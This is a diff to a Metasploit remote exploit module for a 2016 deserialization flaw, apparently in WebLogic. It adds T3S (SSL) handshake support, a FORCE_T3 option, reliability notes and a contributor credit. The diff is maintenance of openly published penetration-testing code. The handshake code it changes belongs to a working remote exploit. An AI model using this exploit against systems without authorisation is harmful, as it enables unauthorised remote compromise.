@@ -22,7 +22,8 @@ class MetasploitModule < Msf::Exploit::Remote
         [
         'Andres Rodriguez',  # Metasploit Module - 2Secure (@acamro, acamro[at]gmail.com)
         'Jacob Baines',      # Vulnerability Discovery - Tenable Network Security
-        'Aaron Soto'         # Reverse Engineering JSO and ysoserial blobs
+        'Aaron Soto',        # Reverse Engineering JSO and ysoserial blobs
+        'Steve Embling'      # T3S support
         ],
       'License' => MSF_LICENSE,
       'References' =>
@@ -63,9 +64,20 @@ class MetasploitModule < Msf::Exploit::Remote
         ],
       'DefaultTarget' => 0,
       'DefaultOptions' => { 'WfsDelay' => 12 },
-      'DisclosureDate' => '2016-07-19'))
+      'DisclosureDate' => '2016-07-19',
+      'Notes' => {
+        'Reliability' => [REPEATABLE_SESSION],
+        'Stability' => [CRASH_SAFE],
+        'SideEffects' => [IOC_IN_LOGS]
+      }))
 
-    register_options([Opt::RPORT(7001)])
+      register_options([
+        Opt::RPORT(7001),
+      ])
+
+      register_advanced_options([
+        OptBool.new('FORCE_T3', [false, 'Force T3 protocol even over SSL', false])
+      ])
   end
 
 =begin   This check is currently incompatible with the Tcp mixin.  :-(
@@ -105,7 +117,12 @@ class MetasploitModule < Msf::Exploit::Remote
 
   def t3_handshake
     # retrieved from network traffic
-    shake = "t3 12.2.1\n"
+    if !datastore['SSL'] || datastore['FORCE_T3']
+      shake = 't3'
+    else
+      shake = 't3s'
+    end
+    shake << " 12.2.1\n"
     shake << "AS:255\n"
     shake << "HL:19\n"
     shake << "MS:10000000\n\n"
